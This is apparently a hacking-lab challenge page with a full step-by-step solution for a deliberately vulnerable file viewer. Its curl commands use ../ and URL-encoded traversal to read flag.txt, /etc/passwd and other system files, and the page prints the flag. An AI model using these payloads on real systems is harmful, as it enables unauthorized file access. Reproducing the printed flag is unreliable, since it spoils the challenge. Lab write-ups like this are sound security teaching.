Avatar

Labs / Simple Directory Traversal

  • Challenge
  • Released 29 Sep 2025

📁 Can you escape the directory and access restricted files?

This simple file viewer uses direct string concatenation to build file paths, creating the perfect opportunity for directory traversal attacks. 📁 Directory traversal is a fundamental web vulnerability that allows attackers to access files outside the intended directory, potentially exposing sensitive system files and configuration data. The application trusts user input without validation - a classic mistake that opens the door to file system exploitation! 🎯

1
Flags
1
Points
Challenge
Pro Exclusive
Start Lab Environment
~1-2 min setup
AWS dedicated
Private instance
Industry standard
Challenge

📁 Simple Directory Traversal - Complete Solution

Objective: Exploit directory traversal vulnerability in a simple file viewer application to access files outside the intended directory and retrieve the system flag.
🔍 Step 1: Application Discovery

Access the web application and explore its functionality:

curl -s http:///

The application is a "Simple File Viewer" that allows users to view text files. It shows available files: readme.txt, sample.txt, and info.txt.

🔍 Step 2: Normal File Viewing

Test the normal file viewing functionality:

curl -s "http:///view?file=readme.txt"

The application displays the file contents and shows the file path as "files/readme.txt", revealing how the path is constructed.

🔍 Step 3: Path Analysis

Examine how the file parameter is processed:

curl -s "http:///view?file=sample.txt"

The response shows "File Path: files/sample.txt", indicating direct string concatenation without validation.

🔍 Step 4: Directory Traversal Testing

Test for directory traversal using ../ sequences:

curl -s "http:///view?file=../flag.txt"

This attempts to access a file one directory level up from the files directory.

🔍 Step 5: Flag Extraction

Successfully retrieve the flag using directory traversal:

# Extract the flag
curl -s "http:///view?file=../flag.txt" | grep -o '[0-9a-f]\{8\}-[0-9a-f]\{4\}-[0-9a-f]\{4\}-[0-9a-f]\{4\}-[0-9a-f]\{12\}'

The flag is revealed: cddc6bda-3d66-48e7-9848-6672afc2a5c8

🔍 Step 6: System File Access

Demonstrate accessing system files to show the full impact:

# Access system passwd file
curl -s "http:///view?file=../../etc/passwd"

This shows how directory traversal can be used to access sensitive system files.

🔍 Step 7: Multiple Traversal Levels

Test multiple directory levels to understand the file system structure:

# Try different traversal depths
curl -s "http:///view?file=../../../etc/hosts"
curl -s "http:///view?file=../../../../proc/version"

This demonstrates how multiple ../ sequences can traverse deeper into the file system.

🔍 Step 8: URL Encoding Bypass

Test URL encoding to bypass potential filters:

# URL-encoded directory traversal
curl -s "http:///view?file=%2e%2e%2fflag.txt"

This shows how URL encoding (%2e%2e%2f for ../) can bypass basic input filters.

🔍 Step 9: Path Information Disclosure

Observe how the application reveals the actual file paths:

curl -s "http:///view?file=../flag.txt" | grep "File Path:"

The response shows "File Path: files/../flag.txt", confirming the path construction method.

🔍 Step 10: Vulnerability Confirmation

Confirm the directory traversal vulnerability allows arbitrary file access:

# Verify the vulnerability
curl -s "http:///view?file=../flag.txt" | grep "SYSTEM FLAG"

This confirms successful exploitation of the directory traversal vulnerability.

🛡️ Security Implications

This challenge demonstrates a real directory traversal vulnerability where ../ sequences allow attackers to access files outside the intended directory. The vulnerability occurs because user input is directly concatenated into file paths without proper validation or sanitization. This can lead to unauthorized file access, information disclosure, and potential system compromise - making it a critical security vulnerability in web applications.